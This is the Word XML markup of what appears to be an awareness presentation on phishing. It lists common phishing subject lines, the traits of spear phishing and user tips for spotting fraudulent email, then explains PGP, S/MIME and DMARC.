          <w:strike w:val="0"/>
          <w:color w:val="000b3a"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Barracuda Networks researchers compiled a list of the top 12 most common  subject lines used in phishing emails targeting businesses.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23681640625" w:line="239.88186836242676" w:lineRule="auto"/>
        <w:ind w:left="249.5199966430664" w:right="705.853271484375" w:firstLine="26.639976501464844"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000b3a"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000b3a"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Researchers analyzed over 360,000 phishing emails &amp; found the most common  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000b3a"/>
          <w:sz w:val="36.040000915527344"/>
          <w:szCs w:val="36.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subject line used in attacks is simply ‗Request‘ – accounting for over a third of all  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000b3a"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the phishing messages analyzed.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240478515625" w:line="239.9037265777588" w:lineRule="auto"/>
        <w:ind w:left="280.8399963378906" w:right="3535.5419921875" w:hanging="31.31999969482422"/>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1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The report found the top 12 subject lines were as followed: </w:t>
      </w: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1. Request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5361328125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="253.8399887084961"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2. Follow up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40" w:lineRule="auto"/>
        <w:ind w:left="256.719970703125"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3. Urgent/Important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40" w:lineRule="auto"/>
        <w:ind w:left="253.47999572753906"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4. Are you available?/Are you at your desk?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255.99998474121094"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5. Payment Status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40" w:lineRule="auto"/>
        <w:ind w:left="258.1599807739258"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6. Hello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257.79998779296875"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7. Purchase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996826171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="258.1599807739258"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8. Invoice Due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259.59999084472656"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9. Re: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35400390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="280.8399963378906"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10.Direct Deposit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35400390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="280.8399963378906"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11.Expenses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35400390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="280.8399963378906"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12.Payroll</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7795867919922" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72.04000091552734"/>
          <w:szCs w:val="72.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72.04000091552734"/>
          <w:szCs w:val="72.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spear Phishing Characteristics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927734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="249.5199966430664" w:right="0" w:firstLine="0"/>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A spear-phishing attack can display one or more of the following characteristics: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7939453125" w:line="239.90405559539795" w:lineRule="auto"/>
        <w:ind w:left="257.0939636230469" w:right="887.58056640625" w:firstLine="6.466026306152344"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="36.040000915527344"/>
          <w:szCs w:val="36.040000915527344"/>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 Blended or multi-vector threat. Spear phishing uses a blend of email spoofing,  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="36.040000915527344"/>
          <w:szCs w:val="36.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic URLs and drive-by downloads to bypass traditional defenses.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240478515625" w:line="239.90405559539795" w:lineRule="auto"/>
        <w:ind w:left="255.99998474121094" w:right="683.05908203125" w:firstLine="7.560005187988281"/>
        <w:jc w:val="both"/>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 Use of zero-day vulnerabilities. Advanced spear-phishing attacks leverage zero day vulnerabilities in browsers, plug-ins and desktop applications to compromise  systems.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2374267578125" w:line="239.90398406982422" w:lineRule="auto"/>
        <w:ind w:left="249.5199966430664" w:right="403.419189453125" w:firstLine="14.039993286132812"/>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 Multi-stage attack. The initial exploit of systems is the first stage of an APT attack  that involves further stages of malware outbound communications, binary  downloads and data exfiltration.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240478515625" w:line="239.97802734375" w:lineRule="auto"/>
        <w:ind w:left="255.99998474121094" w:right="560.859375" w:firstLine="7.560005187988281"/>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 Well-crafted email forgeries: Spearphishing email threats are usually targeted to  individuals, so they don‘t bear much resemblance to the high-volume, broadcast  spam that floods the Internet. This means traditional reputation and spam filters  routinely miss these messages, rendering traditional email protections ineffective.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199737548828"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How to protect against phishing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560546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="14.925193786621094" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48.040000915527344"/>
          <w:szCs w:val="48.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="40.84000015258789"/>
          <w:szCs w:val="40.8400001525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STOP. THINK. CONNECT.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72900390625" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="718.5600280761719" w:right="151.580810546875" w:hanging="271.6560363769531"/>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Before you click, look for common baiting tactics e.g.  Requests for personal information, Announcement indicating  you won a prize or lottery or Requests for donations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89823913574" w:lineRule="auto"/>
        <w:ind w:left="741.1199951171875" w:right="2556.77978515625" w:hanging="294.2160034179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Look for spelling errors (e.g., ―pessward‖), lack of  punctuation or poor grammar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40412902832" w:lineRule="auto"/>
        <w:ind w:left="744.4800567626953" w:right="1406.77978515625" w:hanging="297.57606506347656"/>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Hyperlinked URL differs from the one displayed, or it is  hidden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080078125" w:line="263.89440536499023" w:lineRule="auto"/>
        <w:ind w:left="14.903984069824219" w:right="1496.060791015625" w:firstLine="432.00000762939453"/>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Threatening language that calls for immediate action </w:t>
      </w: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Install and maintain antivirus software on your electronic  devices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119018554688" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="14.903984069824219"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93a299"/>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Use email filters to reduce spam and malicious traffic</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199737548828"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How to protect against phishing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599365234375" w:line="216.06257915496826" w:lineRule="auto"/>
        <w:ind w:left="314.8967742919922" w:right="98.031005859375" w:hanging="295.47718048095703"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="57.959999084472656"/>
          <w:szCs w:val="57.959999084472656"/>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Be wary of messages asking for passwords or other  personal information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16.06257915496826" w:lineRule="auto"/>
        <w:ind w:left="750.9540557861328" w:right="977.66357421875" w:hanging="299.5344543457031"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="57.959999084472656"/>
          <w:szCs w:val="57.959999084472656"/>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All reputable businesses and organizations will  never ask for your password via email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6156616210938" w:line="216.06257915496826" w:lineRule="auto"/>
        <w:ind w:left="301.57997131347656" w:right="644.012451171875" w:hanging="282.1603775024414"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="58"/>
          <w:szCs w:val="58"/>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Never send passwords, bank account numbers or  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="58"/>
          <w:szCs w:val="58"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">other private information in an email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32.06725597381592" w:lineRule="auto"/>
        <w:ind w:left="451.4196014404297" w:right="81.02294921875" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="57.959999084472656"/>
          <w:szCs w:val="57.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pP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Do not reply to requests for this information </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="49.31999969482422"/>
          <w:szCs w:val="49.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7.959999084472656"/>
          <w:szCs w:val="57.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify by contacting the company or individual, but  do not use the contact information included in the  message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199737548828"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How to protect against phishing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960205078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="15.79437255859375" w:right="0" w:firstLine="0"/>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Do not click on any hyperlinks in the email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333251953125" w:line="215.74111461639404" w:lineRule="auto"/>
        <w:ind w:left="717.2832489013672" w:right="419.83642578125" w:hanging="269.48883056640625"/>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User your computer mouse to hover over each link to  verify its actual destination, even if the message appears  to be from a trusted source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131591796875" w:line="231.72187328338623" w:lineRule="auto"/>
        <w:ind w:left="447.79441833496094" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="50.08000183105469"/>
          <w:szCs w:val="50.08000183105469"/>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Pay attention to the URL and look for a variation in spelling  or different domain (e.g., ulster.ac vs. ulster.com) </w:t>
      </w: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Consider navigating to familiar sites on your own instead  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="50.08000183105469"/>
          <w:szCs w:val="50.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">of using links within messages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31518554688" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="15.79437255859375" w:right="0" w:firstLine="0"/>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Examine websites closely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3317260742188" w:line="239.71223831176758" w:lineRule="auto"/>
        <w:ind w:left="447.79441833496094" w:right="414.332275390625" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="50.040000915527344"/>
          <w:szCs w:val="50.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pP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Malicious websites may look identical to legitimate sites </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="42.480003356933594"/>
          <w:szCs w:val="42.48000335693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50.040000915527344"/>
          <w:szCs w:val="50.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for ―https://‖ or a lock icon in the address bar before  entering any sensitive information on a website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Protecting Against Email Attacks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560546875" w:line="251.8883514404297" w:lineRule="auto"/>
        <w:ind w:left="8.639984130859375" w:right="290.782470703125" w:firstLine="15.866012573242188"/>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not to trust the content of email from a malicious or unknown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sender, and source email addresses can be spoofed so any  message can appear to come from a trusted source.  need a way to ensure the authenticity of email from supposedly  reliable sources.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418212890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="34.56001281738281"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PGP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39.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="4.3199920654296875" w:right="1064.061279296875" w:firstLine="30.240020751953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PGP stands for Pretty Good Privacy. It was invented by Phil  Zimmerman in 1991.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080078125" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="21.1199951171875" w:right="235.1025390625" w:hanging="9.119987487792969"/>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Originally a free package, it became a commercial product after  being bought by Network Associates in 1996.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99462890625" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="21.1199951171875" w:right="1014.62158203125" w:hanging="21.1199951171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freeware version is still available. PGP is widely available,  both in commercial versions and freeware.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Protecting Against Email Attacks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560546875" w:line="239.87088203430176" w:lineRule="auto"/>
        <w:ind w:left="10.55999755859375" w:right="349.483642578125" w:firstLine="24.03438568115234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PGP addresses the key distribution problem with what is called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 ―ring of trust‖ or a user‘s ―keyring.‖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89823913574" w:lineRule="auto"/>
        <w:ind w:left="25.91999053955078" w:right="719.661865234375" w:hanging="13.919982910156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One user directly gives a public key to another, or the second  user fetches the first‘s public key from a server.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40412902832" w:lineRule="auto"/>
        <w:ind w:left="11.040000915527344" w:right="667.5830078125" w:firstLine="5.760002136230469"/>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Some people include their PGP public keys at the bottom of  email messages. And one person can give a second person‘s  key to a third (and a fourth, and so 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080078125" w:line="239.90396976470947" w:lineRule="auto"/>
        <w:ind w:left="12.480010986328125" w:right="327.81982421875" w:hanging="12.480010986328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Thus, the key association problem becomes one of caveat  emptor (let the buyer beware): If I trust you, I may also trust the  keys you give me for other people.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396976470947" w:lineRule="auto"/>
        <w:ind w:left="25.439987182617188" w:right="414.940185546875" w:hanging="25.439987182617188"/>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model breaks down intellectually when you give me all the  keys you received from people, who in turn gave you all the  keys they got from still other people, who gave them all their  keys,and so forth.</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Protecting Against Email Attacks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560546875" w:line="263.867826461792" w:lineRule="auto"/>
        <w:ind w:left="12.480010986328125" w:right="1114.461669921875" w:firstLine="6.261177062988281"/>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 Create a random session key for a symmetric algorithm.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Encrypt the message, using the session key (for message  confidentiality).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01220703125" w:line="255.8976173400879" w:lineRule="auto"/>
        <w:ind w:left="18.71997833251953" w:right="176.379394531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Encrypt the session key under the recipient‘s public key. • Generate a message digest or hash of the message; sign the  hash by encrypting it with the sender‘s private key (for message  integrity and authenticity).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4775390625" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="10.55999755859375" w:right="741.502685546875" w:firstLine="8.159980773925781"/>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Attach the encrypted session key to the encrypted message  and digest.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99462890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18.71997833251953" w:right="0"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 Transmit the message to the recipient.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19165039062" w:line="239.90396976470947" w:lineRule="auto"/>
        <w:ind w:left="24.47998046875" w:right="581.661376953125" w:hanging="24.479980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recipient reverses these steps to retrieve and validate the  message content.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Protecting Against Email Attacks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560546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18.741188049316406" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48.040000915527344"/>
          <w:szCs w:val="48.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pP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•S/MIME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72900390625" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="128.380126953125" w:firstLine="0"/>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An Internet standard governs how email is sent and received.  The general MIME specification defines the format and handling  of email attachments.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1689453125" w:line="239.90389823913574" w:lineRule="auto"/>
        <w:ind w:left="36.959991455078125" w:right="609.580078125" w:hanging="20.159988403320312"/>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S/MIME (Secure Multipurpose Internet Mail Extensions) is the  Internet standard for secure email attachments.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22998046875" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="24.47998046875" w:right="1588.221435546875" w:hanging="24.47998046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The principal difference between S/MIME and PGP is the  method of key exchange.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2080078125" w:line="255.8976173400879" w:lineRule="auto"/>
        <w:ind w:left="10.079994201660156" w:right="396.0595703125" w:firstLine="18.240013122558594"/>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Basic PGP depends on each user‘s exchanging keys with all  potential recipients and establishing a ring of trusted recipients; It also requires establishing a degree of trust in the authenticity  of the keys for those recipients.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Protecting Against Email Attacks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96044921875" w:line="215.90014457702637" w:lineRule="auto"/>
        <w:ind w:left="30.23998260498047" w:right="1508.56201171875" w:hanging="11.498794555664062"/>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040000915527344"/>
          <w:szCs w:val="48.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">•S/MIME uses hierarchically validated certificates, usually  </w:t>
      </w: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represented in X.509 format, for key exchange.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376953125" w:line="215.9135913848877" w:lineRule="auto"/>
        <w:ind w:left="12.480010986328125" w:right="1065.5810546875" w:hanging="12.48001098632812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Thus, with S/MIME, the sender and recipient do not need to  have exchanged keys in advance as long as they have a  common certifier they both trust.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2548828125" w:line="231.90722465515137" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="351.74072265625" w:firstLine="16.800003051757812"/>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S/MIME works with a variety of cryptographic algorithms, such  as DES, AES, and RC2 for symmetric encryption. S/MIME performs security transformations very similar to those  for PGP.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25634765625" w:line="215.91360569000244" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0.53955078125" w:firstLine="34.56001281738281"/>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PGP was originally designed for plaintext messages, but  S/MIME handles (secures) all sorts of attachments, such as data  files (for example, spreadsheets, graphics, presentations,  movies, and sound).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285400390625" w:line="215.91360569000244" w:lineRule="auto"/>
        <w:ind w:left="16.800003051757812" w:right="314.539794921875" w:firstLine="11.999969482421875"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because it is integrated into many commercial email packages,  S/MIME is likely to dominate the secure email market.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998229980469"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Best Practice for companies - DMARC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32.15142726898193" w:lineRule="auto"/>
        <w:ind w:left="11.278800964355469" w:right="932.437744140625" w:hanging="275.59558868408203"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="33.959999084472656"/>
          <w:szCs w:val="33.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="33.959999084472656"/>
          <w:szCs w:val="33.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39.959999084472656"/>
          <w:szCs w:val="39.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Organisations should set up DMARC which is Domain-based Message  Authentication, Reporting and Conformance email standard that: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="28.920000076293945"/>
          <w:szCs w:val="28.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292934"/>
          <w:sz w:val="33.959999084472656"/>
          <w:szCs w:val="33.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confirms the sender‘s identity using Sender Policy Framework  (SPF) and DomainKeys Identified Mail (DKIM)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2021484375" w:line="264.12949562072754" w:lineRule="auto"/>
        <w:ind w:left="633.11279296875" w:right="1147.7587890625" w:hanging="2.30316162109375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="33.959999084472656"/>
          <w:szCs w:val="33.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="28.959999084472656"/>
          <w:szCs w:val="28.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tells the recipient‘s email service what to do with emails that fail the check </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
